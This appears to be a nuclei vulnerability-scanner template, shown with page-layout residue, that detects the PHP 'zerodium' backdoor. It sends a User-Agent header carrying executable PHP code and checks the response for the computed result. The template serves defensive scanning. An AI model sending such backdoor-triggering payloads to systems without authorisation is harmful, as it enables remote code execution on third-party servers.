nuclei-templates/vulnerabilities/other/php-zerodium-backdoor-rce.yaml

25 lines
430 B
YAML
Raw Normal View History

2021-06-10 16:31:26 +00:00
id: php-zerodium-backdoor-rce
info:
name: PHP Zerodium Backdoor RCE
author: dhiyaneshDk
reference: https://news-web.php.net/php.internals/113838
severity: high
tags: php,backdoor
requests:
- method: GET
path:
- "{{BaseURL}}"
2021-06-10 16:31:26 +00:00
headers:
User-Agent: zerodiumvar_dump(233*233);
2021-06-10 16:31:26 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "int(54289)"
part: body